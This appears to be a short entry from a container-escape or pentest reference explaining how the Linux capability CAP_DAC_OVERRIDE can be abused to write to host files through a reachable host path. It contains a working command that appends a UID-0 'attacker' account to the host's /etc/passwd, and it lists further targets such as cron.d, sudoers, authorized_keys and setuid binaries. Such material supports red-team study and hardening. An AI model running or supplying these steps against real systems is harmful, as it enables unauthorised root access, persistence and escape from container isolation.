CAP_DAC_OVERRIDE bypasses file write permission checks. It does not by itself cross the mount namespace, but wherever a host path is reachable (a bind mount, a mounted host device, /proc/<pid>/root with host /proc), it turns a read-only-by-permission target into a writable one.
capsh --print | grep -q cap_dac_override && echo have
# With any host path reachable, write despite ownership/mode
echo 'attacker:x:0:0::/root:/bin/sh' >> /host/etc/passwd
Exploitation notes#
- The capability is a force-multiplier for mounts: combine it with a Host path mount or a mounted host device to write files you could otherwise only read.
- Useful targets are
cron.d,passwd,sudoers, andauthorized_keys, or flipping a host binary to setuid. - For reads rather than writes, see CAP_DAC_READ_SEARCH.